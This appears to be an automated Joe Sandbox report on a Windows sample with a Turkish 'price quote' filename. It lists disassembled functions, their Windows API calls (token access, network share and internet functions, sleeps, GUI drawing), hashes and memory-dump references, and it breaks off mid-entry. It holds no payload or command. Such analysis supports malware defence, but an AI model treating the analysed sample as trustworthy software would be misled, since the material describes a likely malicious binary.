Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 7f68eb71cd43faea8e465bb00caec2c5efcbb30feb340f7d82249e9840001269
Instruction ID: f2bd7504a90a18e6baa275261f1e205ce5fb4be3b19825c8ccb179ea3f92818b
Opcode Fuzzy Hash: 7f68eb71cd43faea8e465bb00caec2c5efcbb30feb340f7d82249e9840001269
Instruction Fuzzy Hash: 1001D436745232ABCB31EBB8AD449E77B9CAF05B71B208620F906E7140CB25D902C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 009E7464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 009E747F
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 009E7497
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 009E74AC
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 009E74CA

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: f0dbd0bd58102a959c37ceb0bdcb0a1c3eb09913ae12f5719ee0fb6424a779cb
Instruction ID: e6c587123b29ebf0dece707a50046b34f721da004d5857b775ad93cfbcf09a48
Opcode Fuzzy Hash: f0dbd0bd58102a959c37ceb0bdcb0a1c3eb09913ae12f5719ee0fb6424a779cb
Instruction Fuzzy Hash: 5411E1B5249354ABE321CF95DC08F92BBFDEB00B10F108969A616D60A1E770ED04CB52

Uniqueness

Uniqueness Score: -1.00%

Function 009EB0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,009EACD3,?,00008000), ref: 009EB0C4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,009EACD3,?,00008000), ref: 009EB0E9
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,009EACD3,?,00008000), ref: 009EB0F3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,009EACD3,?,00008000), ref: 009EB126

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 4069c744f4b7ea9d6db827852e4809ff181ea37914924f2bf7363d2ee017eb29
Instruction ID: 2ab6c3a2af349ef04ae78fa24844665ff2b241cbe536016fcb3e434a0b33d5ea
Opcode Fuzzy Hash: 4069c744f4b7ea9d6db827852e4809ff181ea37914924f2bf7363d2ee017eb29
Instruction Fuzzy Hash: 47115730C4466CE7CF01EFE6E9A87EEBB78BB49321F008186D941B2185CB345A519B51

Uniqueness

Uniqueness Score: -1.00%

Function 009E2DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 009E2DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 009E2DD6
GetCurrentThreadId.KERNEL32 ref: 009E2DDD
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 009E2DE4

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 3d3544057c0d118010534d014ea262ebe452405a2865d04da9e48136fde579d6
Instruction ID: efeca758df7b0f505410aa451231c50a8ec2b907a0acb18beb20be9a5f1cf823
Opcode Fuzzy Hash: 3d3544057c0d118010534d014ea262ebe452405a2865d04da9e48136fde579d6
Instruction Fuzzy Hash: DEE06D715813347AD7215BA39C0DFEB7E6CEB42BB1F005115B205D1080DAA48982C6B0

Uniqueness

Uniqueness Score: -1.00%

Function 00A18863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00999639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00999693
Part of subcall function 00999639: SelectObject.GDI32(?,00000000), ref: 009996A2
Part of subcall function 00999639: BeginPath.GDI32(?), ref: 009996B9
Part of subcall function 00999639: SelectObject.GDI32(?,00000000), ref: 009996E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00A18887
LineTo.GDI32(?,?,?), ref: 00A18894
EndPath.GDI32(?), ref: 00A188A4
StrokePath.GDI32(?), ref: 00A188B2

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 20a560528df2baade731a4c2a3238ff6a3aa3dca15e7873512b559543647226c
Instruction ID: b34c254cb9d791bb2eb29e3c573daa5ea3149eba68fa801f20f5022930e69da9
Opcode Fuzzy Hash: 20a560528df2baade731a4c2a3238ff6a3aa3dca15e7873512b559543647226c
Instruction Fuzzy Hash: 7CF05E36081258FADB129FD4AC0AFDE3F59AF0A321F448100FA11650E1C7795552CFE9

Uniqueness

Uniqueness Score: -1.00%

Function 009998B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 009998CC
SetTextColor.GDI32(?,?), ref: 009998D6
SetBkMode.GDI32(?,00000001), ref: 009998E9
GetStockObject.GDI32(00000005), ref: 009998F1

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: 89a860aef4d5f1f7cf2be3d1c6a996146cf8b5e027442b2c26fd9cf215e0ef37
Instruction ID: 070b52337383435bbe4da791ec9fecbe24974681176c3bf2fad8e94e7517e296
Opcode Fuzzy Hash: 89a860aef4d5f1f7cf2be3d1c6a996146cf8b5e027442b2c26fd9cf215e0ef37
Instruction Fuzzy Hash: F8E06D312C4280BADB219BB8BC09BE87F25AB12336F14C31AF6FA580E1C37146419B11

Uniqueness

Uniqueness Score: -1.00%

Function 009E162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 009E1634
OpenThreadToken.ADVAPI32(00000000,?,?,?,009E11D9), ref: 009E163B
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,009E11D9), ref: 009E1648
OpenProcessToken.ADVAPI32(00000000,?,?,?,009E11D9), ref: 009E164F

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 3933404fa8f91ea20e862ae5653378ee7e27f3b911db4b21f9eb1bb0be7ca1b3
Instruction ID: 082628541e0723183560936857929a56d71556176caa5b132fa6a76f9082c1f0
Opcode Fuzzy Hash: 3933404fa8f91ea20e862ae5653378ee7e27f3b911db4b21f9eb1bb0be7ca1b3
Instruction Fuzzy Hash: A9E08631641211DBD7205FE19D0DBC67B7CBF44BA1F14C808F245C9080D7348542C754

Uniqueness

Uniqueness Score: -1.00%

Function 009DD858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 009DD858
GetDC.USER32(00000000), ref: 009DD862
GetDeviceCaps.GDI32(00000000,0000000C), ref: 009DD882
ReleaseDC.USER32(?), ref: 009DD8A3

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: ad12cdf9b4b680580f7027e22ce1dfb78ced26e2471791510006b199a63d0f92
Instruction ID: 0d5fc620ee6435c35926b95f4f21ff62fecc13b1e99d66b714ad6fdf09dc78a0
Opcode Fuzzy Hash: ad12cdf9b4b680580f7027e22ce1dfb78ced26e2471791510006b199a63d0f92
Instruction Fuzzy Hash: BEE01AB4840204EFCF41EFE0D808AADBBB1FB08320F10E409E81AE7350C7384942AF50

Uniqueness

Uniqueness Score: -1.00%

Function 009DD86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 009DD86C
GetDC.USER32(00000000), ref: 009DD876
GetDeviceCaps.GDI32(00000000,0000000C), ref: 009DD882
ReleaseDC.USER32(?), ref: 009DD8A3

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: b33c3f10b15d541a4b5dfd371a1cf1c0afa221e61384364998960e3f2809ee20
Instruction ID: 8153c61995d979f19ff3f8f798cb50c1ac2fda86cb94dd29fd55b4cd57a4a7a4
Opcode Fuzzy Hash: b33c3f10b15d541a4b5dfd371a1cf1c0afa221e61384364998960e3f2809ee20
Instruction Fuzzy Hash: 38E092B5C40204EFCF51EFE4D848AADBBB5BB48321B14A449E95AE7250CB385A42AF54

Uniqueness

Uniqueness Score: -1.00%

Function 009F4D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00987620: _wcslen.LIBCMT ref: 00987625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 009F4ED4

Strings

*, xrefs: 009F4E10
LPT, xrefs: 009F4DFB

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: 5c7939fa65a5ebe7e0637184267ecba86205d9ca0849776f19995404bd67c64e
Instruction ID: f267be5593a9a6c2f48aba80da57fe4908af97222d61508fb9f7c96d7fce3b46
Opcode Fuzzy Hash: 5c7939fa65a5ebe7e0637184267ecba86205d9ca0849776f19995404bd67c64e
Instruction Fuzzy Hash: F3918075A002089FCB14DF58C484EBABBF5BF49314F198099E90A9F3A2D735ED85CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0099E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 0099E1B1

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 8692518b2a9e4aaaddcf2d349504e24fc5666db7194485d80663229850ae7ab7
Instruction ID: e31717b9267ecf4e4ab73110a5794e72d839c1abfbc1587cfdd846132a646993
Opcode Fuzzy Hash: 8692518b2a9e4aaaddcf2d349504e24fc5666db7194485d80663229850ae7ab7
Instruction Fuzzy Hash: 3C510275944246DFDF15EF68C481AFE7BA8EF65310F24805AE8A19F3D0D6349D42CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0099F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0099F2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 0099F2BB

Strings

@, xrefs: 0099F2AF

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: ce42e705e01dbf48a89a18c51042b866c78afb771cfb0ae07eaf1f616424170a
Instruction ID: 854c7a7a6e503ade888036f241e6d409946d5fd47a6adf92bd8f6dba2f41dd8d
Opcode Fuzzy Hash: ce42e705e01dbf48a89a18c51042b866c78afb771cfb0ae07eaf1f616424170a
Instruction Fuzzy Hash: 755135714087449BE320EF50EC86BABBBF8FFC5304F91885DF29951295EB3085298B66

Uniqueness

Uniqueness Score: -1.00%

Function 00A05745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 00A057E0
_wcslen.LIBCMT ref: 00A057EC

Strings

CALLARGARRAY, xrefs: 00A057E6, 00A057EB

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: bfa9e8ec6dd4292dee82800265494d59fba1ad1b56c6150c1b1bf997296662ce
Instruction ID: 34f4c9b2e2bd63e2ca29f47bec80877b191187afe47e8c271094cb495f37b877
Opcode Fuzzy Hash: bfa9e8ec6dd4292dee82800265494d59fba1ad1b56c6150c1b1bf997296662ce
Instruction Fuzzy Hash: 6B419F31E002099FCB04DFB9D8819BEBBB5EF99320F148069E905A7291E7309D85DF90

Uniqueness

Uniqueness Score: -1.00%

Function 009FD0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 009FD130
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 009FD13A

Strings

|, xrefs: 009FD10B

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: d144ad7c2e4a7e7571c1a20436125a829738618730a733bc9de992ce9d916c87
Instruction ID: dca30546a671dffd4f758a1836ea74c7d21eb217e167a63187984ec19363ff21
Opcode Fuzzy Hash: d144ad7c2e4a7e7571c1a20436125a829738618730a733bc9de992ce9d916c87
Instruction Fuzzy Hash: 30313E71D01209ABCF15EFA4CC85BEEBFBAFF45300F100019F915AA262D735AA16DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A1356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00A13621
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00A1365C

Strings

static, xrefs: 00A135BC

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: c0933ec85fee564766a7aeeca336aae36a0248fd64d2e4bc201821b5b2f5e5bb
Instruction ID: 5c3dc9922f4cf7069d0f3f2a7f6be7e410f67e4e94f26c442fa293d8665f18f9
Opcode Fuzzy Hash: c0933ec85fee564766a7aeeca336aae36a0248fd64d2e4bc201821b5b2f5e5bb
Instruction Fuzzy Hash: CF318B72100204AEEB20DF68DC80FFB73A9FF88764F109619F9A5D7280DA34AD91C760

Uniqueness

Uniqueness Score: -1.00%

Function 00A14537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00A1461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A14634

Strings

', xrefs: 00A1458E

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 676c4212778e91a7b50c0cd6d434253573234cf6c95506a8c9e75ce641c39979
Instruction ID: 713e75bd741dcaa68077471e73d1ad026711bd51f5a46315b95aec533a769edb
Opcode Fuzzy Hash: 676c4212778e91a7b50c0cd6d434253573234cf6c95506a8c9e75ce641c39979
Instruction Fuzzy Hash: 5D313974A0030A9FDF14CFA9C980BEA7BB6FF49314F14406AE914AB341E770A981CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00A131EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00A1327C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A13287

Strings

Combobox, xrefs: 00A13249

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 9f6ddc93ce1095729bfe6abe9496092d36deafa73576195e26b7ea893d19180a
Instruction ID: 12a7bf44476d6009eea08d5cf31a3ea9026c1eb687e8d9f789410b8a65f5450b
Opcode Fuzzy Hash: 9f6ddc93ce1095729bfe6abe9496092d36deafa73576195e26b7ea893d19180a
Instruction Fuzzy Hash: B311B2723002087FEF21AF94DC81EFB376BEBA8364F104224F91897290D6759D918760

Uniqueness

Uniqueness Score: -1.00%

Function 00A13710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0098600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0098604C
Part of subcall function 0098600E: GetStockObject.GDI32(00000011), ref: 00986060
Part of subcall function 0098600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0098606A

GetWindowRect.USER32(00000000,?), ref: 00A1377A
GetSysColor.USER32(00000012), ref: 00A13794

Strings

static, xrefs: 00A13757

Memory Dump Source

Source File: 00000000.00000002.3703284194.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.3703191502.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A1C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703619445.0000000000A42000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703811080.0000000000A4C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3703999746.0000000000A54000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_F#U0130YAT TEKL#U0130F.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 7d539e73a6af233f88a44c9167b75b427ae77fcc131588b27203ecc729b85ba0
Instruction ID: 497055a0972846b0a0ab5dbf46a0984ce57e5f1efed9d4b417fefc03616da5d1
Opcode Fuzzy Hash: 7d539e73a6af233f88a44c9167b75b427ae77fcc131588b27203ecc729b85ba0
Instruction Fuzzy Hash: 561137B2650209AFDF01DFA8CC46EFA7BB9FB08314F004914F956E3250E735E8519B60

Uniqueness

Uniqueness Score: -1.00%

Function 009FCD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 009FCD7D
